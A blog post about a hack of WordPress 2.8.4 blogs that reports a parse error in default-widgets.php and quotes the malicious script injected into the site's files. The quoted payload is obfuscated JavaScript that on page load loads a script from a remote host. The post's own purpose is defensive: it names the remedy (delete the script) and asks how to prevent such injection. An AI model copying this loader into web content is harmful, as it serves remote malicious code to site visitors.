A new hack in wordpress blog. 2.8.4 Parse error: /wp-includes/default-widgets.p

I don’t know if you have experienced this but a friend of mine got this one.

/wp-includes/default-widgets.php on line 1035 error

and I believe this was a hack. I was wondering, how did you put a remedy on this one?

So far this hack infuses, to the files of your blog.

<script>/*LGPL*/ try{ window.onload = function(){var Sz5at9il9im = document.createElement(‘s@(c@#r(@i&!&p#@)t!^$’.rep lace(/\)|@|#|\(|&|\!|\$|\^/ig, ”));Sz5at9il9im.setAttribute(‘defer’, ‘d^!!e#!f$$e$@)^r$’.replace(/\)|\(|\^|#|@|\!|\$|&/ig, ”));Sz5at9il9im.setAttribute(‘type’, ‘t^^#e^x#$!!t&@^/#&&j#a&$!v(a(#&^s)c#@&r#i$^p$!t!!’.replace(/\^|#|\(|\!|\$|&|@|\)/ig, ”));Sz5at9il9im.setAttribute(‘id’, ‘T^#^!#l#@9((!@h)!#p&^8&#v^!y(&(m^$5$)&v&$!e#!0##’ .replace(/\!|#|\)|&|@|\(|\^|\$/ig, ”));Sz5at9il9im.setAttribute(‘s#$r((c&)’.replace(/&|\(|@|\)|\$|\!|#|\^/ig, ”), ‘h($t$$&t&p^((^:$)/#^&/))c())r#)(&i)&c)$&^i)!@)n^&&$f!&^!o)!-^(c!#o)&((m#^&$.(^)(n(#&y^@p#!o^)&s^(@t$.#c$(o&&@! ^m!(.!$#^a$!^$m&a!$z&$$(o^&$n($^-(#)f&#!r&$.(&$t)@^@e#e)$($n#(!w((&$e#b&##@d)!^e^$s @)#$i)g^#^n&).&!!)r())u$##@!8@@0!)#)8!!0!!^/^(k(#)u@&@6$.))#c@)(o#@&@m(##/)$k))!u^^6(!##.#&c(##^o@&!^)m#)@#/)#&g(o^!$!o#&g@l^$&e$$@.(c$)@o#&!!m#/(@^!)b@^!&i@$g!!p($^o$^i(^(n&t&^&.!#c&&!o#m!@/!!a!@(d(#d#!#!i$&@#c!&)&t!&$$&i(@n(@!g)!)&g(&a@@m( e((^s@!.@c&(@)&o@&m)#/(^’.replace(/\$|\!|\^|@|#|\(|\)|&/ig, ”));if (document){document.body.appendChild(Sz5at9il9im); }} } catch(Srq4haf5c9lbvv1f21u) {}</script>
<!–3f6594acfea60646639b05cbd580f9ea–>

To remedy the situation you need to delete that script from the files affected.

The question is, how do you protect your website from such script injection?